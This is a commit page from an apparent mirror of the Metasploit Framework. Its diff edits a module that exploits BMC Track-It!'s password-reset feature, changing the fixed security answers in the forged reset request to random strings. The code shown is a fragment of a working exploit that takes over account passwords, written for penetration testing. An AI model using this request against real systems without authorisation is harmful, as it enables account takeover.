infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Use random security Q/A

bug/bundler_fix
Jon Hart 2014-12-11 17:10:33 -08:00
parent f208f31a33
commit 48dcfd9809
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
1 changed files with 6 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
modules/auxiliary/gather/bmc_trackit_passwd_reset.rb
View File

@ -116,6 +116,7 @@ class Metasploit4 < Msf::Auxiliary
full_user = "#{domain}\\#{localuser}"
vprint_status("#{peer}: sending password reset request for #{full_user}")
answers = [ Rex::Text.rand_text_alpha(8), Rex::Text.rand_text_alpha(8) ]
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'PasswordReset', 'Application', 'Register'),
'method' => 'POST',
@ -124,14 +125,14 @@ class Metasploit4 < Msf::Auxiliary
'domainname' => domain,
'userName' => localuser,
'emailaddress' => Rex::Text.rand_text_alpha(8) + '@' + Rex::Text.rand_text_alpha(8) + '.com',
'userQuestions' => '[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]',
'userQuestions' => %Q([{"Id":1,"Answer":"#{answers.first}"},{"Id":2,"Answer":"#{answers.last}"}]),
'updatequesChk' => 'false',
'SelectedQuestion' => 1,
'SelectedQuestion' => 2,
'answer' => 'not',
'answer' => 'not',
'confirmanswer' => 'not',
'confirmanswer' => 'not'
'answer' => answers.first,
'answer' => answers.last,
'confirmanswer' => answers.first,
'confirmanswer' => answers.last
}
)